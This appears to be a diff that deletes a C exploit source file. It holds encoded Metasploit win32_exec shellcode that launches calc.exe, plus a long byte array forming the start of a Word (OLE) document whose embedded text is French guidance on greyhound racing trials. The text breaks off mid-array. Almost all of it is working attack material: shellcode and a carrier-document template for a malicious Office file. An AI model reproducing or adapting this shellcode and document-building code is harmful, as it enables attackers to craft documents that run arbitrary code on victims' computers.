-#include 
-#include 
-#include 
-
-/* win32_exec -  EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */
-unsigned char calc[] =
-"\x33\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xcc"
-"\x35\x6a\xc8\x83\xeb\xfc\xe2\xf4\x30\xdd\x2e\xc8\xcc\x35\xe1\x8d"
-"\xf0\xbe\x16\xcd\xb4\x34\x85\x43\x83\x2d\xe1\x97\xec\x34\x81\x81"
-"\x47\x01\xe1\xc9\x22\x04\xaa\x51\x60\xb1\xaa\xbc\xcb\xf4\xa0\xc5"
-"\xcd\xf7\x81\x3c\xf7\x61\x4e\xcc\xb9\xd0\xe1\x97\xe8\x34\x81\xae"
-"\x47\x39\x21\x43\x93\x29\x6b\x23\x47\x29\xe1\xc9\x27\xbc\x36\xec"
-"\xc8\xf6\x5b\x08\xa8\xbe\x2a\xf8\x49\xf5\x12\xc4\x47\x75\x66\x43"
-"\xbc\x29\xc7\x43\xa4\x3d\x81\xc1\x47\xb5\xda\xc8\xcc\x35\xe1\xa0"
-"\xf0\x6a\x5b\x3e\xac\x63\xe3\x30\x4f\xf5\x11\x98\xa4\x4b\xb2\x2a"
-"\xbf\x5d\xf2\x36\x46\x3b\x3d\x37\x2b\x56\x0b\xa4\xaf\x1b\x0f\xb0"
-"\xa9\x35\x6a\xc8";
-
-char file_part0[]=
-"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x3e\x00\x03\x00\xfe\xff\x09\x00"
-"\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00"
-"\xcc\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\xce\x00\x00\x00"
-"\x01\x00\x00\x00\xfe\xff\xff\xff\x00\x00\x00\x00\xdc\x00\x00\x00"
-"\xcd\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\x32\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xec\xa5\xc1\x00\x35\x40\x09\x04\x00\x00\xf0\x12\xbf\x00\x00\x00"
-"\x00\x00\x00\x30\x00\x00\x00\x00\x00\x06\x00\x00\x1a\x7c\x00\x00"
-"\x0e\x00\x62\x6a\x62\x6a\xcf\x32\xcf\x32\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0c\x04\x16\x00"
-"\x29\x02\x01\x00\xad\x58\x00\x00\xad\x58\x00\x00\xdf\x73\x00\x00"
-"\x00\x00\x00\x00\x3a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x0f\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x0f\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\xff\xff\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x88\x00\x00\x00\x42\x00\x08\x03"
-"\x00\x00\x00\x00\x00\x00\x08\x03\x00\x00\x08\x03\x00\x00\x00\x00"
-"\x00\x00\x08\x03\x00\x00\x00\x00\x00\x00\x08\x03\x00\x00\x00\x00"
-"\x00\x00\x08\x03\x00\x00\x00\x00\x00\x00\x08\x03\x00\x00\x14\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x03\x00\x00\x00\x00"
-"\x00\x00\x04\x56\x00\x00\x00\x00\x00\x00\x04\x56\x00\x00\x00\x00"
-"\x00\x00\x04\x56\x00\x00\x38\x00\x00\x00\x3c\x56\x00\x00\x34\x00"
-"\x00\x00\x70\x56\x00\x00\xdc\x01\x00\x00\x1c\x03\x00\x00\x00\x00"
-"\x00\x00\xcb\x6b\x00\x00\xf2\x00\x00\x00\x58\x58\x00\x00\x00\x00"
-"\x00\x00\x58\x58\x00\x00\x16\x00\x00\x00\x6e\x58\x00\x00\x00\x00"
-"\x00\x00\x6e\x58\x00\x00\x00\x00\x00\x00\x6e\x58\x00\x00\x00\x00"
-"\x00\x00\x6e\x58\x00\x00\x00\x00\x00\x00\x6e\x58\x00\x00\x00\x00"
-"\x00\x00\x6e\x58\x00\x00\x00\x00\x00\x00\x4a\x6b\x00\x00\x02\x00"
-"\x00\x00\x4c\x6b\x00\x00\x00\x00\x00\x00\x4c\x6b\x00\x00\x00\x00"
-"\x00\x00\x4c\x6b\x00\x00\x00\x00\x00\x00\x4c\x6b\x00\x00\x00\x00"
-"\x00\x00\x4c\x6b\x00\x00\x00\x00\x00\x00\x4c\x6b\x00\x00\x24\x00"
-"\x00\x00\xbd\x6c\x00\x00\x52\x02\x00\x00\x0f\x6f\x00\x00\x6e\x00"
-"\x00\x00\x70\x6b\x00\x00\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x03\x00\x00\x00\x00"
-"\x00\x00\x00\x5e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x6e\x58\x00\x00\x00\x00"
-"\x00\x00\x6e\x58\x00\x00\x00\x00\x00\x00\x00\x5e\x00\x00\x00\x00"
-"\x00\x00\x00\x5e\x00\x00\x00\x00\x00\x00\x70\x6b\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x03\x00\x00\x00\x00"
-"\x00\x00\x08\x03\x00\x00\x00\x00\x00\x00\x6e\x58\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x6e\x58\x00\x00\x00\x00"
-"\x00\x00\x85\x6b\x00\x00\x16\x00\x00\x00\x82\x61\x00\x00\x00\x00"
-"\x00\x00\x82\x61\x00\x00\x00\x00\x00\x00\x82\x61\x00\x00\x00\x00"
-"\x00\x00\x00\x5e\x00\x00\xea\x01\x00\x00\x08\x03\x00\x00\x00\x00"
-"\x00\x00\x6e\x58\x00\x00\x00\x00\x00\x00\x08\x03\x00\x00\x00\x00"
-"\x00\x00\x6e\x58\x00\x00\x00\x00\x00\x00\x4a\x6b\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x82\x61\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x5e\x00\x00\x00\x00\x00\x00\x4a\x6b\x00\x00\x00\x00"
-"\x00\x00\x82\x61\x00\x00\xf8\x00\x56\x00\x82\x61\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7a\x62\x00\x00\x00\x00"
-"\x00\x00\x08\x03\x00\x00\x00\x00\x00\x00\x08\x03\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7a\x62\x00\x00\x00\x00"
-"\x00\x00\x6e\x58\x00\x00\x00\x00\x00\x00\x4c\x58\x00\x00\x0c\x00"
-"\x00\x00\xf0\xaa\x92\x0f\x66\x1c\xc6\x01\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x04\x56\x00\x00\x00\x00\x00\x00\xea\x5f\x00\x00\x76\x00"
-"\x00\x00\x7a\x62\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\xce\x62\x00\x00\x7c\x08\x00\x00\x9b\x6b\x00\x00\x30\x00"
-"\x00\x00\xcb\x6b\x00\x00\x00\x00\x00\x00\x7a\x62\x00\x00\x00\x00"
-"\x00\x00\x7d\x6f\x00\x00\x00\x00\x00\x00\x60\x60\x00\x00\x00\x01"
-"\x00\x00\x7d\x6f\x00\x00\x00\x00\x00\x00\x7a\x62\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x03\x00\x00\x00\x00"
-"\x00\x00\x1c\x03\x00\x00\x00\x00\x00\x00\x08\x03\x00\x00\x00\x00"
-"\x00\x00\x08\x03\x00\x00\x00\x00\x00\x00\x08\x03\x00\x00\x00\x00"
-"\x00\x00\x08\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x7a\x62\x00\x00\x14\x00\x00\x00\x7d\x6f\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x03\x00\x00\x00\x00"
-"\x00\x00\x8e\x62\x00\x00\x40\x00\x00\x00\x6e\x58\x00\x00\xf0\x01"
-"\x00\x00\x5e\x5a\x00\x00\x62\x01\x00\x00\x82\x61\x00\x00\x00\x00"
-"\x00\x00\xc0\x5b\x00\x00\x1c\x01\x00\x00\xdc\x5c\x00\x00\x24\x01"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x6e\x58\x00\x00\x00\x00\x00\x00\x6e\x58\x00\x00\x00\x00"
-"\x00\x00\x6e\x58\x00\x00\x00\x00\x00\x00\x70\x6b\x00\x00\x00\x00"
-"\x00\x00\x70\x6b\x00\x00\x00\x00\x00\x00\x1c\x03\x00\x00\x00\x00"
-"\x00\x00\x1c\x03\x00\x00\x84\x51\x00\x00\xa0\x54\x00\x00\x64\x01"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x60\x61\x00\x00\x22\x00"
-"\x00\x00\x1c\x03\x00\x00\x00\x00\x00\x00\x1c\x03\x00\x00\x00\x00"
-"\x00\x00\xa0\x54\x00\x00\x00\x00\x00\x00\x02\x00\x01\x01\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x3e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x4c\x45\x20\x4c\x49\x56\x52\x45\x54\x20\x44\x55\x20\x50\x52\x4f"
-"\x50\x52\x49\x45\x54\x41\x49\x52\x45\x20\x44\x45\x20\x4c\x45\x56"
-"\x52\x49\x45\x52\x20\x53\x50\x4f\x52\x54\x49\x46\x0d\x28\x43\x65"
-"\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x20\x6e\x27\x65\x73\x74\x20"
-"\x70\x61\x73\x20\x75\x6e\x20\x72\xe8\x67\x6c\x65\x6d\x65\x6e\x74"
-"\x20\x6d\x61\x69\x73\x20\x75\x6e\x20\x72\x65\x63\x75\x65\x69\x6c"
-"\x20\x64\x65\x20\x63\x6f\x6e\x73\x65\x69\x6c\x73\x29\x0d\x4f\xf9"
-"\x20\x76\x6f\x75\x73\x20\x61\x64\x72\x65\x73\x73\x65\x72\x20\x3f"
-"\x0d\x49\x6c\x20\x66\x61\x75\x74\x20\x64\x27\x61\x62\x6f\x72\x64"
-"\x20\xe9\x64\x75\x71\x75\x65\x72\x20\x76\x6f\x74\x72\x65\x20\x6a"
-"\x65\x75\x6e\x65\x20\x4c\xe9\x76\x72\x69\x65\x72\x20\xe0\x20\x73"
-"\x75\x69\x76\x72\x65\x20\x6c\x65\x20\x6c\x65\x75\x72\x72\x65\x20"
-"\x6a\x75\x73\x71\x75\x27\x61\x75\x20\x62\x6f\x75\x74\x20\x65\x74"
-"\x20\xe0\x20\x74\x6f\x6c\xe9\x72\x65\x72\x20\x64\x65\x73\x20\x63"
-"\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x73\x2e\x20\x50\x6f\x75\x72"
-"\x20\x63\x65\x6c\x61\x20\x76\x6f\x75\x73\x20\x64\x69\x73\x70\x6f"
-"\x73\x65\x7a\x20\x64\x27\x75\x6e\x20\x72\xe9\x73\x65\x61\x75\x20"
-"\x64\x65\x20\x43\x6c\x75\x62\x73\x20\x64\x65\x20\x54\x72\x61\x76"
-"\x61\x69\x6c\x20\x28\x63\x6c\x75\x62\x73\x20\x64\x65\x20\x63\x6f"
-"\x75\x72\x73\x65\x20\x73\x75\x72\x20\x63\x79\x6e\x6f\x64\x72\x6f"
-"\x6d\x65\x20\x28\x45\x2e\x4e\x2e\x43\x20\x6f\x75\x20\x49\x2e\x54"
-"\x29\x20\x6f\x75\x20\x63\x6c\x75\x62\x73\x20\x64\x65\x20\x70\x6f"
-"\x75\x72\x73\x75\x69\x74\x65\x20\xe0\x20\x76\x75\x65\x20\x73\x75"
-"\x72\x20\x6c\x65\x75\x72\x72\x65\x20\x28\x50\x2e\x56\x2e\x4c\x2e"
-"\x29\x20\x29\x20\x61\x67\x72\xe9\xe9\x73\x20\x70\x61\x72\x20\x6c"
-"\x61\x20\x53\x6f\x63\x69\xe9\x74\xe9\x20\x43\x65\x6e\x74\x72\x61"
-"\x6c\x65\x20\x43\x61\x6e\x69\x6e\x65\x20\x65\x74\x20\x71\x75\x69"
-"\x20\x64\x69\x73\x70\x6f\x73\x65\x6e\x74\x20\x63\x68\x61\x63\x75"
-"\x6e\x20\x64\x27\x75\x6e\x20\x70\xe9\x72\x69\x6d\xe8\x74\x72\x65"
-"\x20\x64\x27\x61\x74\x74\x72\x69\x62\x75\x74\x69\x6f\x6e\x20\x70"
-"\x6f\x75\x72\x20\x6c\x61\x20\x64\xe9\x6c\x69\x76\x72\x61\x6e\x63"
-"\x65\x20\x64\x65\x73\x20\x42\x72\x65\x76\x65\x74\x73\x20\x64\x27"
-"\x41\x70\x74\x69\x74\x75\x64\x65\x20\x61\x75\x78\x20\x43\x6f\x75"
-"\x72\x73\x65\x73\x20\x28\xbd\x2e\x41\x2e\x43\x2e\x19\x20\x6f\x75"
-"\x20\xe0\x20\x6c\x61\x20\x50\x6f\x75\x72\x73\x75\x69\x74\x65\x20"
-"\xe0\x20\x56\x75\x65\x20\x28\x42\x2e\x50\x2e\x56\x2e\x29\x2e\x20"
-"\x4c\x27\x61\x64\x72\x65\x73\x73\x65\x20\x70\x65\x75\x74\x20\x76"
-"\x6f\x75\x73\x20\xea\x74\x72\x65\x20\x66\x6f\x75\x72\x6e\x69\x65"
-"\x20\x70\x61\x72\x20\x6c\x61\x20\x53\x6f\x63\x69\xe9\x74\xe9\x20"
-"\x43\x61\x6e\x69\x6e\x65\x20\x52\xe9\x67\x69\x6f\x6e\x61\x6c\x65"
-"\x20\x6f\x75\x20\x76\x6f\x74\x72\x65\x20\x41\x73\x73\x6f\x63\x69"
-"\x61\x74\x69\x6f\x6e\x20\x73\x70\xe9\x63\x69\x61\x6c\x69\x73\xe9"
-"\x65\x20\x64\x65\x20\x52\x61\x63\x65\x2e\x0d\x53\x69\x20\x76\x6f"
-"\x75\x73\x20\x61\x64\x68\xe9\x72\x65\x7a\x20\xe0\x20\x75\x6e\x20"
-"\x63\x6c\x75\x62\x2c\x20\x76\x6f\x75\x73\x20\x72\x65\x63\x65\x76"
-"\x72\x65\x7a\x20\x74\x6f\x75\x74\x65\x73\x20\x6c\x65\x73\x20\x69"
-"\x6e\x66\x6f\x72\x6d\x61\x74\x69\x6f\x6e\x73\x20\x75\x74\x69\x6c"
-"\x65\x73\x2e\x0d\x0d\x51\x75\x65\x6c\x6c\x65\x73\x20\xe9\x70\x72"
-"\x65\x75\x76\x65\x73\x20\x65\x78\x69\x73\x74\x65\x6e\x74\x20\x3f"
-"\x0d\x49\x6c\x20\x79\x20\x61\x20\x74\x72\x6f\x69\x73\x20\x73\x6f"
-"\x72\x74\x65\x73\x20\x64\x27\xe9\x70\x72\x65\x75\x76\x65\x73\x20"
-"\x3a\x0d\x0d\x31\x29\x20\x4c\x65\x73\x20\x45\x70\x72\x65\x75\x76"
-"\x65\x73\x20\x4e\x61\x74\x69\x6f\x6e\x61\x6c\x65\x73\x20\x73\x75"
-"\x72\x20\x43\x79\x6e\x6f\x64\x72\x6f\x6d\x65\x20\x28\x45\x2e\x4e"
-"\x2e\x43\x2e\x29\x2e\x0d\x42\x61\x70\x74\x69\x73\xe9\x65\x73\x20"
-"\x63\x6f\x75\x72\x73\x65\x73\x20\x6f\x75\x20\x72\x61\x63\x69\x6e"
-"\x67\x20\x64\x61\x6e\x73\x20\x6e\x6f\x74\x72\x65\x20\x6a\x61\x72"
-"\x67\x6f\x6e\x20\x65\x6c\x6c\x65\x73\x20\x73\x65\x20\x64\xe9\x72"
-"\x6f\x75\x6c\x65\x6e\x74\x20\x73\x75\x72\x20\x75\x6e\x20\x63\x79"
-"\x6e\x6f\x64\x72\x6f\x6d\x65\x2c\x20\xe9\x74\x61\x6c\x6f\x6e\x6e"
-"\xe9\x20\x70\x75\x69\x73\x20\x61\x67\x72\xe9\xe9\x20\x70\x61\x72"
-"\x20\x6c\x61\x20\x43\x6f\x6d\x6d\x69\x73\x73\x69\x6f\x6e\x20\x4e"
-"\x61\x74\x69\x6f\x6e\x61\x6c\x65\x20\x64\x27\x55\x74\x69\x6c\x69"
-"\x73\x61\x74\x69\x6f\x6e\x20\x64\x65\x73\x20\x4c\xe9\x76\x72\x69"
-"\x65\x72\x73\x20\x64\x69\x74\x65\x22\x20\x43\x6f\x6d\x6d\x69\x73"
-"\x73\x69\x6f\x6e\x20\x4c\xe9\x76\x72\x69\x65\x72\x73\x22\x2e\x0d"
-"\x4c\x65\x20\x4c\xe9\x76\x72\x69\x65\x72\x20\x79\x20\x64\x69\x73"
-"\x70\x75\x74\x65\x20\x64\x27\x61\x62\x6f\x72\x64\x20\x75\x6e\x65"
-"\x20\x63\x6f\x75\x72\x73\x65\x20\x63\x6f\x6e\x74\x72\x65\x20\x6c"
-"\x61\x20\x6d\x6f\x6e\x74\x72\x65\x20\x64\x69\x74\x65\x20\x64\x65"
-"\x20\x71\x75\x61\x6c\x69\x66\x69\x63\x61\x74\x69\x6f\x6e\x2c\x20"
-"\x61\x70\x70\x72\xe9\x63\x69\xe9\x65\x20\x70\x61\x72\x20\x72\x61"
-"\x70\x70\x6f\x72\x74\x20\xe0\x20\x75\x6e\x65\x20\x76\x69\x74\x65"
-"\x73\x73\x65\x20\x64\x65\x20\x72\xe9\x66\xe9\x72\x65\x6e\x63\x65"
-"\x20\x28\x31\x30\x20\xe0\x20\x31\x35\x20\x6d\xe8\x74\x72\x65\x73"
-"\x20\x70\x61\x72\x20\x73\x65\x63\x6f\x6e\x64\x65\x73\x29\x20\x64"
-"\x69\x74\x65\x20\x74\x65\x6d\x70\x73\x20\x64\x65\x20\x62\x61\x73"
-"\x65\x2e\x0d\x49\x6c\x20\x65\x73\x74\x20\x61\x6c\x6f\x72\x73\x20"
-"\x63\x6c\x61\x73\x73\xe9\x20\x65\x6e\x20\x3a\x20\x49\x6e\x74\x65"
-"\x72\x6e\x04\x74\x69\x6f\x6e\x61\x6c\x65\x2c\x20\x41\x2c\x20\x42"
-"\x2c\x20\x43\x2c\x20\x44\x2e\x0d\x45\x6e\x73\x75\x69\x74\x65\x20"
-"\x69\x6c\x20\x64\x69\x73\x70\x75\x74\x65\x20\x64\x65\x73\x20\x63"
-"\x6f\x75\x72\x73\x65\x73\x20\xe0\x20\x6c\x61\x20\x70\x6c\x61\x63"
-"\x65\x20\x6f\xf9\x20\x69\x6c\x20\x61\x66\x66\x72\x6f\x6e\x74\x65"
-"\x20\x6c\x65\x73\x20\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x73"
-"\x20\x64\x65\x20\x73\x61\x20\x63\x61\x74\xe9\x67\x6f\x72\x69\x65"
-"\x2e\x0d\x0d\x32\x29\x20\x4c\x65\x73\x20\x45\x70\x72\x65\x75\x76"
-"\x65\x73\x20\x49\x6e\x74\x65\x72\x6e\x61\x74\x69\x6f\x6e\x61\x6c"
-"\x65\x73\x2e\x20\x28\x49\x2e\x54\x29\x0d\x43\x65\x20\x73\x6f\x6e"
-"\x74\x20\x64\x65\x73\x20\xe9\x70\x72\x65\x75\x76\x65\x73\x20\x69"
-"\x6e\x74\x65\x72\x6e\x61\x74\x69\x6f\x6e\x61\x6c\x65\x73\x20\x73"
-"\x75\x72\x20\x63\x79\x6e\x6f\x64\x72\x6f\x6d\x65\x2e\x20\x45\x6c"
-"\x6c\x65\x73\x20\x73\x65\x20\x64\x69\x73\x70\x75\x74\x65\x6e\x74"
-"\x20\xe0\x20\x6c\x61\x20\x70\x6c\x61\x63\x65\x2c\x20\x61\x70\x72"
-"\xe8\x73\x20\x73\xe9\x6c\x65\x63\x74\x69\x6f\x6e\x73\x20\x73\x6f"
-"\x69\x74\x20\x61\x75\x20\x74\x65\x6d\x70\x73\x2c\x20\x73\x6f\x69"
-"\x74\x20\xe0\x20\x6c\x61\x20\x70\x6c\x61\x63\x65\x20\x65\x6e\x20"
-"\x73\xe9\x72\x69\x65\x73\x2e\x0d\x45\x6c\x6c\x65\x73\x20\x64\x69"
-"\x98\x66\xe8\x72\x65\x6e\x74\x20\x64\x65\x73\x20\x45\x2e\x4e\x2e"
-"\x43\x2e\x20\x70\x61\x72\x20\x6c\x61\x20\x72\xe9\x70\x61\x72\x74"
-"\x69\x74\x69\x6f\x6e\x20\x64\x65\x73\x20\x63\x61\x74\xe9\x67\x6f"
-"\x72\x69\x65\x73\x20\x65\x6e\x20\x6c\x27\x61\x62\x73\x65\x6e\x63"
-"\x65\x20\x64\x27\x75\x6e\x20\x6d\x69\x6e\x69\x6d\x75\x6d\x20\x69"
-"\x6d\x70\x6f\x73\xe9\x20\x64\x65\x20\x76\x69\x74\x65\x73\x73\x65"
